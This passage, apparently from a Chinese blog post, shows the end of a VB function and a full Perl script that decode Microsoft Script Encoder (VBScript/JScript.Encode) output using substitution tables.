Script = Replace(Script, "@$", "@") '最后生成@
'k = YXScrDecode(Script, s, Len(Script))
k = YXScrDecoder(Script, s)
's = Replace(s, Chr(13) + Chr(2), vbCrLf)'查出来是0x10和0x0A的原因
'引出另一个问题,为什么char数组第-1个元素为0x02
frmMain.Caption = "碰到我算你倒霉!"
DCScript = Left(s, k)
End Function
perl代码
#!/usr/bin/perl -w --
# VBScript/JScript.Encode Decoder
# Based on Full-Disclosure message "VBScript/JScript.Encode Decoder"
# by Andreas Marx <amarx [at] gega-it>, dated 16 Sep 03
# http://lists.netsys.com/pipermail/full-disclosure/2003-September/010155.html
#
# See also:
# http://www.saltstorm.net/lib-soya/examples/Soya.Encode.ScriptDecoder.wbm
# http://www.saltstorm.net/lib-soya/Soya/Encode/ScriptDecoder.js
# http://www.virtualconspiracy.com/scrdec.html
# http://www.virtualconspiracy.com/download/scrdec14.c
# http://www.r4k.net/dec/dec.pl
@itab = ( # table order
0,2,1,0,2,1,2,1,1,2,1,2,0,1,2,1,
0,1,2,1,0,0,2,1,1,2,0,1,2,1,1,2,
0,0,1,2,1,2,1,0,1,0,0,2,1,0,1,2,
0,1,2,1,0,0,2,1,1,0,0,2,1,0,1,2);
@dectab0 = ( # tables to decrypt
"\x00","\x01","\x02","\x03","\x04","\x05","\x06","\x07","\x08","\x57","\x0A","\x0B","\x0C","\x0D","\x0E","\x0F",
"\x10","\x11","\x12","\x13","\x14","\x15","\x16","\x17","\x18","\x19","\x1A","\x1B","\x1C","\x1D","\x1E","\x1F",
"\x2E","\x47","\x7A","\x56","\x42","\x6A","\x2F","\x26","\x49","\x41","\x34","\x32","\x5B","\x76","\x72","\x43",
"\x38","\x39","\x70","\x45","\x68","\x71","\x4F","\x09","\x62","\x44","\x23","\x75","\x3C","\x7E","\x3E","\x5E",
"\xFF","\x77","\x4A","\x61","\x5D","\x22","\x4B","\x6F","\x4E","\x3B","\x4C","\x50","\x67","\x2A","\x7D","\x74",
"\x54","\x2B","\x2D","\x2C","\x30","\x6E","\x6B","\x66","\x35","\x25","\x21","\x64","\x4D","\x52","\x63","\x3F",
"\x7B","\x78","\x29","\x28","\x73","\x59","\x33","\x7F","\x6D","\x55","\x53","\x7C","\x3A","\x5F","\x65","\x46",
"\x58","\x31","\x69","\x6C","\x5A","\x48","\x27","\x5C","\x3D","\x24","\x79","\x37","\x60","\x51","\x20","\x36");
@dectab1 = (
"\x00","\x01","\x02","\x03","\x04","\x05","\x06","\x07","\x08","\x7B","\x0A","\x0B","\x0C","\x0D","\x0E","\x0F",
"\x10","\x11","\x12","\x13","\x14","\x15","\x16","\x17","\x18","\x19","\x1A","\x1B","\x1C","\x1D","\x1E","\x1F",
"\x32","\x30","\x21","\x29","\x5B","\x38","\x33","\x3D","\x58","\x3A","\x35","\x65","\x39","\x5C","\x56","\x73",
"\x66","\x4E","\x45","\x6B","\x62","\x59","\x78","\x5E","\x7D","\x4A","\x6D","\x71","\x3C","\x60","\x3E","\x53",
"\xFF","\x42","\x27","\x48","\x72","\x75","\x31","\x37","\x4D","\x52","\x22","\x54","\x6A","\x47","\x64","\x2D",
"\x20","\x7F","\x2E","\x4C","\x5D","\x7E","\x6C","\x6F","\x79","\x74","\x43","\x26","\x76","\x25","\x24","\x2B",
"\x28","\x23","\x41","\x34","\x09","\x2A","\x44","\x3F","\x77","\x3B","\x55","\x69","\x61","\x63","\x50","\x67",
"\x51","\x49","\x4F","\x46","\x68","\x7C","\x36","\x70","\x6E","\x7A","\x2F","\x5F","\x4B","\x5A","\x2C","\x57");
@dectab2 = (
"\x00","\x01","\x02","\x03","\x04","\x05","\x06","\x07","\x08","\x6E","\x0A","\x0B","\x0C","\x06","\x0E","\x0F",
"\x10","\x11","\x12","\x13","\x14","\x15","\x16","\x17","\x18","\x19","\x1A","\x1B","\x1C","\x1D","\x1E","\x1F",
"\x2D","\x75","\x52","\x60","\x71","\x5E","\x49","\x5C","\x62","\x7D","\x29","\x36","\x20","\x7C","\x7A","\x7F",
"\x6B","\x63","\x33","\x2B","\x68","\x51","\x66","\x76","\x31","\x64","\x54","\x43","\x3C","\x3A","\x3E","\x7E",
"\xFF","\x45","\x2C","\x2A","\x74","\x27","\x37","\x44","\x79","\x59","\x2F","\x6F","\x26","\x72","\x6A","\x39",
"\x7B","\x3F","\x38","\x77","\x67","\x53","\x47","\x34","\x78","\x5D","\x30","\x23","\x5A","\x5B","\x6C","\x48",
"\x55","\x70","\x69","\x2E","\x4C","\x21","\x24","\x4E","\x50","\x09","\x56","\x73","\x35","\x61","\x4B","\x58",
"\x3B","\x57","\x22","\x6D","\x4D","\x25","\x28","\x46","\x4A","\x32","\x41","\x3D","\x5F","\x4F","\x42","\x65");
$_ = join('', <>);
(m/\Q#@~^\E/ and $_ = $') or die "Start marker not found\n";
(m/\Q^#~@\E/ and $_ = $`) or die "End marker not found\n";
# We do not check leading checksum. Is trailing checksum always present?
(m/^[A-Za-z0-9+\/]{6}==/ and $_ = $') or die "No leading checksum\n";
(m/[A-Za-z0-9+\/]{6}==$/ and $_ = $`); # or die "No trailing checksum\n";
$pos = 0; # decrypt encrypted block
$special = 0;
foreach (split //) {
if ($special) {
$special = 0;
tr/&#!*$/\n\r<>@/;
}
elsif ($_ lt "\x80") { # encrypted?
if ($itab[$pos] == 0) { $_ = $dectab0[ord($_)]; }
elsif ($itab[$pos] == 1) { $_ = $dectab1[ord($_)]; }
elsif ($itab[$pos] == 2) { $_ = $dectab2[ord($_)]; }
if ($_ eq "\xff") {
$special = 1;
next;
}
}
print;
$pos = ($pos+1)%64;
}
若有收获,就点个赞吧
0 人点赞
